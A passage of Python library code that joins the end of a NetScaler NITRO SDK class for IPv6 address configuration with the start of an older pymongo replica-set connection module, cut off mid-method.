ur"""Type of LSAs to be used by the IPv6 OSPF protocol, running on the NetScaler appliance, for advertising the route for the VIP6 address.<br/>Default value: EXTERNAL<br/>Possible values = INTRA_AREA, EXTERNAL
"""
try :
self._ospf6lsatype = ospf6lsatype
except Exception as e:
raise e
@property
def ospfarea(self) :
ur"""ID of the area in which the Intra-Area-Prefix LSAs are to be advertised for the VIP6 address by the IPv6 OSPF protocol running on the NetScaler appliance. When ospfArea is not set, VIP6 is advertised on all areas.<br/>Default value: -1<br/>Maximum length = 4294967294LU.
"""
try :
return self._ospfarea
except Exception as e:
raise e
@ospfarea.setter
def ospfarea(self, ospfarea) :
ur"""ID of the area in which the Intra-Area-Prefix LSAs are to be advertised for the VIP6 address by the IPv6 OSPF protocol running on the NetScaler appliance. When ospfArea is not set, VIP6 is advertised on all areas.<br/>Default value: -1<br/>Maximum length = 4294967294LU
"""
try :
self._ospfarea = ospfarea
except Exception as e:
raise e
@property
def state(self) :
ur"""Enable or disable the IP address.<br/>Default value: ENABLED<br/>Possible values = DISABLED, ENABLED.
"""
try :
return self._state
except Exception as e:
raise e
@state.setter
def state(self, state) :
ur"""Enable or disable the IP address.<br/>Default value: ENABLED<br/>Possible values = DISABLED, ENABLED
"""
try :
self._state = state
except Exception as e:
raise e
@property
def map(self) :
ur"""Mapped IPV4 address for the IPV6 address.
"""
try :
return self._map
except Exception as e:
raise e
@map.setter
def map(self, map) :
ur"""Mapped IPV4 address for the IPV6 address.
"""
try :
self._map = map
except Exception as e:
raise e
@property
def ownernode(self) :
ur"""ID of the cluster node for which you are adding the IP address. Must be used if you want the IP address to be active only on the specific node. Can be configured only through the cluster IP address. Cannot be changed after the IP address is created.<br/>Default value: 255.
"""
try :
return self._ownernode
except Exception as e:
raise e
@ownernode.setter
def ownernode(self, ownernode) :
ur"""ID of the cluster node for which you are adding the IP address. Must be used if you want the IP address to be active only on the specific node. Can be configured only through the cluster IP address. Cannot be changed after the IP address is created.<br/>Default value: 255
"""
try :
self._ownernode = ownernode
except Exception as e:
raise e
@property
def td(self) :
ur"""Integer value that uniquely identifies the traffic domain in which you want to configure the entity. If you do not specify an ID, the entity becomes part of the default traffic domain, which has an ID of 0.<br/>Maximum length = 4094.
"""
try :
return self._td
except Exception as e:
raise e
@td.setter
def td(self, td) :
ur"""Integer value that uniquely identifies the traffic domain in which you want to configure the entity. If you do not specify an ID, the entity becomes part of the default traffic domain, which has an ID of 0.<br/>Maximum length = 4094
"""
try :
self._td = td
except Exception as e:
raise e
@property
def iptype(self) :
ur"""The type of the IPv6 address.<br/>Possible values = NSIP, VIP, SNIP, GSLBsiteIP, ADNSsvcIP, CLIP.
"""
try :
return self._iptype
except Exception as e:
raise e
@property
def curstate(self) :
ur"""Current state of this IP.<br/>Default value: ENABLED<br/>Possible values = DISABLED, ENABLED.
"""
try :
return self._curstate
except Exception as e:
raise e
@property
def viprtadv2bsd(self) :
ur"""Whether this route is advertised to FreeBSD.
"""
try :
return self._viprtadv2bsd
except Exception as e:
raise e
@property
def vipvsercount(self) :
ur"""Number of vservers bound to this VIP.
"""
try :
return self._vipvsercount
except Exception as e:
raise e
@property
def vipvserdowncount(self) :
ur"""Number of vservers bound to this VIP, which are down.
"""
try :
return self._vipvserdowncount
except Exception as e:
raise e
@property
def systemtype(self) :
ur"""The type of the System. Possible Values: Standalone, HA, Cluster. Used for display purpose.<br/>Possible values = Stand-alone, HA, Cluster.
"""
try :
return self._systemtype
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(nsip6_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.nsip6
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.ipv6address is not None :
return str(self.ipv6address)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
ur""" Use this API to add nsip6.
"""
try :
if type(resource) is not list :
addresource = nsip6()
addresource.ipv6address = resource.ipv6address
addresource.scope = resource.scope
addresource.type = resource.type
addresource.vlan = resource.vlan
addresource.nd = resource.nd
addresource.icmp = resource.icmp
addresource.vserver = resource.vserver
addresource.telnet = resource.telnet
addresource.ftp = resource.ftp
addresource.gui = resource.gui
addresource.ssh = resource.ssh
addresource.snmp = resource.snmp
addresource.mgmtaccess = resource.mgmtaccess
addresource.restrictaccess = resource.restrictaccess
addresource.dynamicrouting = resource.dynamicrouting
addresource.hostroute = resource.hostroute
addresource.ip6hostrtgw = resource.ip6hostrtgw
addresource.metric = resource.metric
addresource.vserverrhilevel = resource.vserverrhilevel
addresource.ospf6lsatype = resource.ospf6lsatype
addresource.ospfarea = resource.ospfarea
addresource.state = resource.state
addresource.map = resource.map
addresource.ownernode = resource.ownernode
addresource.td = resource.td
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].ipv6address = resource[i].ipv6address
addresources[i].scope = resource[i].scope
addresources[i].type = resource[i].type
addresources[i].vlan = resource[i].vlan
addresources[i].nd = resource[i].nd
addresources[i].icmp = resource[i].icmp
addresources[i].vserver = resource[i].vserver
addresources[i].telnet = resource[i].telnet
addresources[i].ftp = resource[i].ftp
addresources[i].gui = resource[i].gui
addresources[i].ssh = resource[i].ssh
addresources[i].snmp = resource[i].snmp
addresources[i].mgmtaccess = resource[i].mgmtaccess
addresources[i].restrictaccess = resource[i].restrictaccess
addresources[i].dynamicrouting = resource[i].dynamicrouting
addresources[i].hostroute = resource[i].hostroute
addresources[i].ip6hostrtgw = resource[i].ip6hostrtgw
addresources[i].metric = resource[i].metric
addresources[i].vserverrhilevel = resource[i].vserverrhilevel
addresources[i].ospf6lsatype = resource[i].ospf6lsatype
addresources[i].ospfarea = resource[i].ospfarea
addresources[i].state = resource[i].state
addresources[i].map = resource[i].map
addresources[i].ownernode = resource[i].ownernode
addresources[i].td = resource[i].td
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
ur""" Use this API to delete nsip6.
"""
try :
if type(resource) is not list :
deleteresource = nsip6()
if type(resource) != type(deleteresource):
deleteresource.ipv6address = resource
else :
deleteresource.ipv6address = resource.ipv6address
deleteresource.td = resource.td
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].ipv6address = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].ipv6address = resource[i].ipv6address
deleteresources[i].td = resource[i].td
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
ur""" Use this API to update nsip6.
"""
try :
if type(resource) is not list :
updateresource = nsip6()
updateresource.ipv6address = resource.ipv6address
updateresource.td = resource.td
updateresource.nd = resource.nd
updateresource.icmp = resource.icmp
updateresource.vserver = resource.vserver
updateresource.telnet = resource.telnet
updateresource.ftp = resource.ftp
updateresource.gui = resource.gui
updateresource.ssh = resource.ssh
updateresource.snmp = resource.snmp
updateresource.mgmtaccess = resource.mgmtaccess
updateresource.restrictaccess = resource.restrictaccess
updateresource.state = resource.state
updateresource.map = resource.map
updateresource.dynamicrouting = resource.dynamicrouting
updateresource.hostroute = resource.hostroute
updateresource.ip6hostrtgw = resource.ip6hostrtgw
updateresource.metric = resource.metric
updateresource.vserverrhilevel = resource.vserverrhilevel
updateresource.ospf6lsatype = resource.ospf6lsatype
updateresource.ospfarea = resource.ospfarea
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].ipv6address = resource[i].ipv6address
updateresources[i].td = resource[i].td
updateresources[i].nd = resource[i].nd
updateresources[i].icmp = resource[i].icmp
updateresources[i].vserver = resource[i].vserver
updateresources[i].telnet = resource[i].telnet
updateresources[i].ftp = resource[i].ftp
updateresources[i].gui = resource[i].gui
updateresources[i].ssh = resource[i].ssh
updateresources[i].snmp = resource[i].snmp
updateresources[i].mgmtaccess = resource[i].mgmtaccess
updateresources[i].restrictaccess = resource[i].restrictaccess
updateresources[i].state = resource[i].state
updateresources[i].map = resource[i].map
updateresources[i].dynamicrouting = resource[i].dynamicrouting
updateresources[i].hostroute = resource[i].hostroute
updateresources[i].ip6hostrtgw = resource[i].ip6hostrtgw
updateresources[i].metric = resource[i].metric
updateresources[i].vserverrhilevel = resource[i].vserverrhilevel
updateresources[i].ospf6lsatype = resource[i].ospf6lsatype
updateresources[i].ospfarea = resource[i].ospfarea
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
ur""" Use this API to unset the properties of nsip6 resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = nsip6()
if type(resource) != type(unsetresource):
unsetresource.ipv6address = resource
else :
unsetresource.ipv6address = resource.ipv6address
unsetresource.td = resource.td
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
unsetresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].ipv6address = resource[i]
else :
if (resource and len(resource) > 0) :
unsetresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].ipv6address = resource[i].ipv6address
unsetresources[i].td = resource[i].td
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
ur""" Use this API to fetch all the nsip6 resources that are configured on netscaler.
"""
try :
if not name :
obj = nsip6()
response = obj.get_resources(client, option_)
else :
if type(name) == cls :
if type(name) is not list :
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(name)
response = name.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [nsip6() for _ in range(len(name))]
for i in range(len(name)) :
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(name[i])
response[i] = name[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
ur""" Use this API to fetch filtered set of nsip6 resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = nsip6()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
ur""" Use this API to count the nsip6 resources configured on NetScaler.
"""
try :
obj = nsip6()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
ur""" Use this API to count filtered the set of nsip6 resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = nsip6()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Iptype:
NSIP = "NSIP"
VIP = "VIP"
SNIP = "SNIP"
GSLBsiteIP = "GSLBsiteIP"
ADNSsvcIP = "ADNSsvcIP"
CLIP = "CLIP"
class Ssh:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class State:
DISABLED = "DISABLED"
ENABLED = "ENABLED"
class Ospf6lsatype:
INTRA_AREA = "INTRA_AREA"
EXTERNAL = "EXTERNAL"
class Scope:
GLOBAL = "global"
link_local = "link-local"
class Nd:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Systemtype:
Stand_alone = "Stand-alone"
HA = "HA"
Cluster = "Cluster"
class Gui:
ENABLED = "ENABLED"
SECUREONLY = "SECUREONLY"
DISABLED = "DISABLED"
class Dynamicrouting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Type:
NSIP = "NSIP"
VIP = "VIP"
SNIP = "SNIP"
GSLBsiteIP = "GSLBsiteIP"
ADNSsvcIP = "ADNSsvcIP"
CLIP = "CLIP"
class Mgmtaccess:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Hostroute:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Ftp:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Vserverrhilevel:
ONE_VSERVER = "ONE_VSERVER"
ALL_VSERVERS = "ALL_VSERVERS"
NONE = "NONE"
VSVR_CNTRLD = "VSVR_CNTRLD"
class Icmp:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Vserver:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Snmp:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Curstate:
DISABLED = "DISABLED"
ENABLED = "ENABLED"
class Restrictaccess:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Telnet:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class nsip6_response(base_response) :
def __init__(self, length=1) :
self.nsip6 = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.nsip6 = [nsip6() for _ in range(length)]
| {
"content_hash": "5e606d890b76aa8dd2e65f39ab7edfcb",
"timestamp": "",
"source": "github",
"line_count": 954,
"max_line_length": 320,
"avg_line_length": 32.81341719077568,
"alnum_prop": 0.7013800153335037,
"repo_name": "atopuzov/nitro-python",
"id": "daa52249177be33bd2351385f69bd8338175b1c4",
"size": "31918",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nssrc/com/citrix/netscaler/nitro/resource/config/ns/nsip6.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "10881939"
},
{
"name": "Shell",
"bytes": "513"
}
],
"symlink_target": ""
} |
"""Tools for connecting to a MongoDB replica set.
.. seealso:: :doc:`/examples/replica_set` for more examples of how to
connect to a replica set.
To get a :class:`~pymongo.database.Database` instance from a
:class:`ReplicaSetConnection` use either dictionary-style or
attribute-style access:
.. doctest::
>>> from pymongo import ReplicaSetConnection
>>> c = ReplicaSetConnection('localhost:27017', replicaSet='repl0')
>>> c.test_database
Database(ReplicaSetConnection([u'...', u'...']), u'test_database')
>>> c['test_database']
Database(ReplicaSetConnection([u'...', u'...']), u'test_database')
"""
import datetime
import socket
import struct
import sys
import threading
import time
import warnings
import weakref
from bson.son import SON
from pymongo import (common,
database,
helpers,
message,
pool,
uri_parser,
ReadPreference)
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
DuplicateKeyError,
InvalidDocument,
OperationFailure)
if sys.platform.startswith('java'):
from select import cpython_compatible_select as select
else:
from select import select
MAX_BSON_SIZE = 4 * 1024 * 1024
def _closed(sock):
"""Return True if we know socket has been closed, False otherwise.
"""
try:
readers, _, _ = select([sock], [], [], 0)
# Any exception here is equally bad (select.error, ValueError, etc.).
except Exception:
return True
return len(readers) > 0
def _partition_node(node):
"""Split a host:port string returned from mongod/s into
a (host, int(port)) pair needed for socket.connect().
"""
host = node
port = 27017
idx = node.rfind(':')
if idx != -1:
host, port = node[:idx], int(node[idx + 1:])
if host.startswith('['):
host = host[1:-1]
return host, port
class Monitor(threading.Thread):
def __init__(self, obj, interval=5):
super(Monitor, self).__init__()
self.obj = weakref.proxy(obj)
self.interval = interval
def run(self):
while True:
try:
self.obj.refresh()
# The connection object has been
# collected so we should die.
except ReferenceError:
break
except:
pass
time.sleep(self.interval)
class ReplicaSetConnection(common.BaseObject):
"""Connection to a MongoDB replica set.
"""
def __init__(self, hosts_or_uri=None, max_pool_size=10,
document_class=dict, tz_aware=False, **kwargs):
"""Create a new connection to a MongoDB replica set.
The resultant connection object has connection-pooling built
in. It also performs auto-reconnection when necessary. If an
operation fails because of a connection error,
:class:`~pymongo.errors.ConnectionFailure` is raised. If
auto-reconnection will be performed,
:class:`~pymongo.errors.AutoReconnect` will be
raised. Application code should handle this exception
(recognizing that the operation failed) and then continue to
execute.
Raises :class:`~pymongo.errors.ConnectionFailure` if
the connection cannot be made.
The `hosts_or_uri` parameter can be a full `mongodb URI
<http://dochub.mongodb.org/core/connections>`_, in addition to
a string of `host:port` pairs (e.g. 'host1:port1,host2:port2').
If `hosts_or_uri` is None 'localhost:27017' will be used.
:Parameters:
- `hosts_or_uri` (optional): A MongoDB URI or string of `host:port`
pairs. If a host is an IPv6 literal it must be enclosed in '[' and
']' characters following the RFC2732 URL syntax (e.g. '[::1]' for
localhost)
- `max_pool_size` (optional): The maximum size limit for
each connection pool.
- `document_class` (optional): default class to use for
documents returned from queries on this connection
- `tz_aware` (optional): if ``True``,
:class:`~datetime.datetime` instances returned as values
in a document by this :class:`Connection` will be timezone
aware (otherwise they will be naive)
- `replicaSet`: (required) The name of the replica set to connect to.
The driver will verify that each host it connects to is a member of
this replica set. Can be passed as a keyword argument or as a
MongoDB URI option.
Other optional parameters can be passed as keyword arguments:
- `safe`: Use getlasterror for each write operation?
- `j` or `journal`: Block until write operations have been commited
to the journal. Ignored if the server is running without
journaling. Implies safe=True.
- `w`: (integer or string) If this is a replica set write operations
won't return until they have been replicated to the specified
number or tagged set of servers.
Implies safe=True.
- `wtimeoutMS`: Used in conjunction with `j` and/or `w`. Wait this
many milliseconds for journal acknowledgement and/or write
replication. Implies safe=True.
- `fsync`: Force the database to fsync all files before returning
When used with `j` the server awaits the next group commit before
returning. Implies safe=True.
- `socketTimeoutMS`: How long a send or receive on a socket can take
before timing out.
- `connectTimeoutMS`: How long a connection can take to be opened
before timing out.
- `ssl`: If True, create the connection to the servers using SSL.
- `read_preference`: The read preference for this connection.
See :class:`~pymongo.ReadPreference` for available options.
- `slave_okay` or `slaveOk` (deprecated): Use `read_preference`
instead.
.. versionadded:: 2.1
"""
self.__max_pool_size = max_pool_size
self.__document_class = document_class
self.__tz_aware = tz_aware
self.__opts = {}
self.__seeds = set()
self.__hosts = None
self.__arbiters = set()
self.__writer = None
self.__readers = []
self.__pools = {}
self.__index_cache = {}
self.__auth_credentials = {}
username = None
db_name = None
if hosts_or_uri is None:
self.__seeds.add(('localhost', 27017))
elif '://' in hosts_or_uri:
res = uri_parser.parse_uri(hosts_or_uri)
self.__seeds.update(res['nodelist'])
username = res['username']
password = res['password']
db_name = res['database']
self.__opts = res['options']
else:
self.__seeds.update(uri_parser.split_hosts(hosts_or_uri))
for option, value in kwargs.iteritems():
option, value = common.validate(option, value)
self.__opts[option] = value
self.__name = self.__opts.get('replicaset')
if not self.__name:
raise ConfigurationError("the replicaSet "
"keyword parameter is required.")
self.__net_timeout = self.__opts.get('sockettimeoutms')
self.__conn_timeout = self.__opts.get('connecttimeoutms')
self.__use_ssl = self.__opts.get('ssl', False)
if self.__use_ssl and not pool.have_ssl:
raise ConfigurationError("The ssl module is not available. If you "
"are using a python version previous to "
"2.6 you must install the ssl package "
"from PyPI.")
super(ReplicaSetConnection, self).__init__(**self.__opts)
if self.slave_okay:
warnings.warn("slave_okay is deprecated. Please "
"use read_preference instead.", DeprecationWarning)
self.refresh()
monitor_thread = Monitor(self)
monitor_thread.setName("ReplicaSetMonitorThread")
monitor_thread.setDaemon(True)
monitor_thread.start()
if db_name and username is None:
warnings.warn("must provide a username and password "
"to authenticate to %s" % (db_name,))
if username:
db_name = db_name or 'admin'
if not self[db_name].authenticate(username, password):
raise ConfigurationError("authentication failed")
def _cached(self, dbname, coll, index):
"""Test if `index` is cached.
"""
cache = self.__index_cache
now = datetime.datetime.utcnow()
return (dbname in cache and
coll in cache[dbname] and
index in cache[dbname][coll] and
now < cache[dbname][coll][index])
def _cache_index(self, dbase, collection, index, ttl):
"""Add an index to the index cache for ensure_index operations.
"""
now = datetime.datetime.utcnow()
expire = datetime.timedelta(seconds=ttl) + now
if dbase not in self.__index_cache:
self.__index_cache[dbase] = {}
self.__index_cache[dbase][collection] = {}
self.__index_cache[dbase][collection][index] = expire
elif collection not in self.__index_cache[dbase]:
self.__index_cache[dbase][collection] = {}
self.__index_cache[dbase][collection][index] = expire
else:
self.__index_cache[dbase][collection][index] = expire
def _purge_index(self, database_name,
collection_name=None, index_name=None):
"""Purge an index from the index cache.
If `index_name` is None purge an entire collection.
If `collection_name` is None purge an entire database.
"""
if not database_name in self.__index_cache:
return
if collection_name is None:
del self.__index_cache[database_name]
return
if not collection_name in self.__index_cache[database_name]:
return
if index_name is None:
del self.__index_cache[database_name][collection_name]
return
if index_name in self.__index_cache[database_name][collection_name]:
del self.__index_cache[database_name][collection_name][index_name]
def _cache_credentials(self, db_name, username, password):
"""Add credentials to the database authentication cache
for automatic login when a socket is created.
If credentials are already cached for `db_name` they
will be replaced.
"""
self.__auth_credentials[db_name] = (username, password)
def _purge_credentials(self, db_name=None):
"""Purge credentials from the database authentication cache.
If `db_name` is None purge credentials for all databases.
"""
if db_name is None:
self.__auth_credentials.clear()
elif db_name in self.__auth_credentials:
del self.__auth_credentials[db_name]
def __check_auth(self, sock, authset):
"""Authenticate using cached database credentials.
If credentials for the 'admin' database are available only
this database is authenticated, since this gives global access.
"""
names = set(self.__auth_credentials.iterkeys())
# Logout from any databases no longer listed in the credentials cache.
for dbname in authset - names:
try:
self.__simple_command(sock, dbname, {'logout': 1})
# TODO: We used this socket to logout. Fix logout so we don't
# have to catch this.
except OperationFailure:
pass
authset.discard(dbname)
# Once logged into the admin database we can access anything.
if "admin" in authset:
return
if "admin" in self.__auth_credentials:
username, password = self.__auth_credentials["admin"]
self.__auth(sock, 'admin', username, password)
authset.add('admin')
else:
for db_name in names - authset:
user, pwd = self.__auth_credentials[db_name]
self.__auth(sock, db_name, user, pwd)
authset.add(db_name)
@property
def seeds(self):
"""The seed list used to connect to this replica set.
"""
return self.__seeds
@property
def hosts(self):
"""All active and passive (priority 0) replica set
members known to this connection. This does not include
hidden or slaveDelay members, or arbiters.
"""
return self.__hosts
@property
def primary(self):
"""The current primary of the replica set.
Returns None if there is no primary.
"""
return self.__writer
@property
def secondaries(self):
"""The secondary members known to this connection.
"""
return set(self.__readers)
@property
def arbiters(self):
"""The arbiters known to this connection.
"""
return self.__arbiters
@property
def max_pool_size(self):
"""The maximum pool size limit set for this connection.
"""
return self.__max_pool_size
def get_document_class(self):
"""document_class getter"""
return self.__document_class
def set_document_class(self, klass):
"""document_class setter"""
self.__document_class = klass
document_class = property(get_document_class, set_document_class,
doc="""Default class to use for documents
returned on this connection.
""")
@property
def tz_aware(self):
"""Does this connection return timezone-aware datetimes?
"""
return self.__tz_aware
@property
def max_bson_size(self):
"""Returns the maximum size BSON object the connected primary
accepts in bytes. Defaults to 4MB in server < 1.7.4. Returns
0 if no primary is available.
"""
if self.__writer:
return self.__pools[self.__writer]['max_bson_size']
return 0
def __simple_command(self, sock, dbname, spec):
"""Send a command to the server.
"""
rqst_id, msg, _ = message.query(0, dbname + '.$cmd', 0, -1, spec)
sock.sendall(msg)
response = self.__recv_msg(1, rqst_id, sock)
response = helpers._unpack_response(response)['data'][0]
msg = "command %r failed: %%s" % spec
helpers._check_command_response(response, None, msg)
return response
def __auth(self, sock, dbname, user, passwd):
"""Authenticate socket `sock` against database `dbname`.
"""
# Get a nonce
response = self.__simple_command(sock, dbname, {'getnonce': 1})
nonce = response['nonce']
key = helpers._auth_key(nonce, user, passwd)
# Actually authenticate
query = SON([('authenticate', 1),
('user', user), ('nonce', nonce), ('key', key)])
self.__simple_command(sock, dbname, query)
def __is_master(self, host):
"""Directly call ismaster.
"""
mongo = pool.Pool(host, self.__max_pool_size,
self.__net_timeout, self.__conn_timeout,
self.__use_ssl)
sock = mongo.get_socket()[0]
response = self.__simple_command(sock, 'admin', {'ismaster': 1})
return response, mongo
def __update_pools(self):
"""Update the mapping of (host, port) pairs to connection pools.
"""
secondaries = []
for host in self.__hosts:
mongo = None
try:
if host in self.__pools:
mongo = self.__pools[host]
sock = self.__socket(mongo)
res = self.__simple_command(sock, 'admin', {'ismaster': 1})
else:
res, conn = self.__is_master(host)
bson_max = res.get('maxBsonObjectSize', MAX_BSON_SIZE)
self.__pools[host] = {'pool': conn,
'last_checkout': time.time(),
'max_bson_size': bson_max}
except (ConnectionFailure, socket.error):
if mongo:
mongo['pool'].discard_socket()
continue
# Only use hosts that are currently in 'secondary' state
# as readers.
if res['secondary']:
secondaries.append(host)
elif res['ismaster']:
self.__writer = host
self.__readers = secondaries
def refresh(self):
"""Iterate through the existing host list, or possibly the
seed list, to update the list of hosts and arbiters in this
replica set.
"""
errors = []
nodes = self.__hosts or self.__seeds
hosts = set()
for node in nodes:
mongo = None
try:
if node in self.__pools:
mongo = self.__pools[node]
sock = self.__socket(mongo)
response = self.__simple_command(sock, 'admin',
{'ismaster': 1})
else:
response, conn = self.__is_master(node)
# Check that this host is part of the given replica set.
set_name = response.get('setName')
# The 'setName' field isn't returned by mongod before 1.6.2
# so we can't assume that if it's missing this host isn't in
# the specified set.
if set_name and set_name != self.__name:
host, port = node
raise ConfigurationError("%s:%d is not a member of "
"replica set %s"
% (host, port, self.__name))
if "arbiters" in response:
self.__arbiters = set([_partition_node(h)
for h in response["arbiters"]])
if "hosts" in response:
hosts.update([_partition_node(h)
for h in response["hosts"]])
if "passives" in response:
hosts.update([_partition_node(h)
for h in response["passives"]])
except (ConnectionFailure, socket.error), why:
if mongo:
mongo['pool'].discard_socket()
errors.append("%s:%d: %s" % (node[0], node[1], str(why)))
if hosts:
self.__hosts = hosts
break
else:
if errors:
raise AutoReconnect(', '.join(errors))
raise ConfigurationError('No suitable hosts found')
self.__update_pools()
def __check_is_primary(self, host):
"""Checks if this host is the primary for the replica set.
"""
try:
mongo = None
if host in self.__pools:
mongo = self.__pools[host]
sock = self.__socket(mongo)
res = self.__simple_command(sock, 'admin', {'ismaster': 1})
else:
res, conn = self.__is_master(host)
bson_max = res.get('maxBsonObjectSize', MAX_BSON_SIZE)
self.__pools[host] = {'pool': conn,
'last_checkout': time.time(),
'max_bson_size': bson_max}
except (ConnectionFailure, socket.error), why:
if mongo:
mongo['pool'].discard_socket()
raise ConnectionFailure("%s:%d: %s" % (host[0], host[1], str(why)))
if res["ismaster"]:
return host
elif "primary" in res:
candidate = _partition_node(res["primary"])
# Don't report the same connect failure multiple times.
try:
return self.__check_is_primary(candidate)
except (ConnectionFailure, socket.error):
pass
raise AutoReconnect('%s:%d: not primary' % host)
def __find_primary(self):
"""Returns a connection to the primary of this replica set,
if one exists.
"""
if self.__writer:
return self.__pools[self.__writer]
# This is either the first connection or we had a failover.
self.refresh()
errors = []
for candidate in self.__hosts:
try:
self.__writer = self.__check_is_primary(candidate)
return self.__pools[self.__writer]
except (ConnectionFailure, socket.error), why:
errors.append(str(why))
# Couldn't find the primary.
raise AutoReconnect(', '.join(errors))
def __socket(self, mongo):
"""Get a socket from the pool.
If it's been > 1 second since the last time we checked out a
socket, we also check to see if the socket has been closed -
this let's us avoid seeing *some*
:class:`~pymongo.errors.AutoReconnect` exceptions on server
hiccups, etc. We only do this if it's been > 1 second since
the last socket checkout, to keep performance reasonable - we
can't avoid those completely anyway.
"""
sock, authset = mongo['pool'].get_socket()
now = time.time()
if now - mongo['last_checkout'] > 1:
if _closed(sock):
mongo['pool'] = pool.Pool(mongo['pool'].host,
self.__max_pool_size,
self.__net_timeout,
self.__conn_timeout,
self.__use_ssl)
sock, authset = mongo['pool'].get_socket()
mongo['last_checkout'] = now
if self.__auth_credentials or authset:
self.__check_auth(sock, authset)
return sock
def disconnect(self):
"""Disconnect from the replica set primary.
"""
self.__writer = None
def close(self):
"""Disconnect from all set members.
"""
self.__writer = None
self.__pools = {}
def __check_response_to_last_error(self, response):
"""Check a response to a lastError message for errors.
`response` is a byte string representing a response to the message.
If it represents an error response we raise OperationFailure.
Return the response as a document.
"""
response = helpers._unpack_response(response)
assert response["number_returned"] == 1
error = response["data"][0]
helpers._check_command_response(error, self.disconnect)
error_msg = error.get("err", "")
if error_msg is None:
return error
if error_msg.startswith("not master"):
self.disconnect()
raise AutoReconnect(error_msg)
if "code" in error:
if error["code"] in [11000, 11001, 12582]:
raise DuplicateKeyError(error["err"])
else:
raise OperationFailure(error["err"], error["code"])
else:
raise OperationFailure(error["err"])
def __recv_data(self, length, sock):
"""Lowest level receive operation.
Takes length to receive and repeatedly calls recv until able to
return a buffer of that length, raising ConnectionFailure on error.
"""
chunks = []
while length:
chunk = sock.recv(length)
if chunk == "":
raise ConnectionFailure("connection closed")
length -= len(chunk)
chunks.append(chunk)
return "".join(chunks)
def __recv_msg(self, operation, request_id, sock):
"""Receive a message in response to `request_id` on `sock`.
Returns the response data with the header removed.
"""
header = self.__recv_data(16, sock)
length = struct.unpack("<i", header[:4])[0]
resp_id = struct.unpack("<i", header[8:12])[0]
assert resp_id == request_id, "ids don't match %r %r" % (resp_id,
request_id)
assert operation == struct.unpack("<i", header[12:])[0]
return self.__recv_data(length - 16, sock)
def __check_bson_size(self, msg, max_size):
"""Make sure the message doesn't include BSON documents larger
than the connected server will accept.
:Parameters:
- `msg`: message to check
"""
if len(msg) == 3:
request_id, data, max_doc_size = msg
if max_doc_size > max_size:
raise InvalidDocument("BSON document too large (%d bytes)"
" - the connected server supports"
" BSON document sizes up to %d"
" bytes." %
(max_doc_size, max_size))
return (request_id, data)
# get_more and kill_cursors messages
# don't include BSON documents.
return msg
def _send_message(self, msg, safe=False, _connection_to_use=None):
"""Say something to Mongo.
Raises ConnectionFailure if the message cannot be sent. Raises
OperationFailure if `safe` is ``True`` and the
response to the getLastError call returns an error. Return the
response from lastError, or ``None`` if `safe` is ``False``.
:Parameters:
- `msg`: message to send
- `safe`: check getLastError status after sending the message
"""
if _connection_to_use in (None, -1):
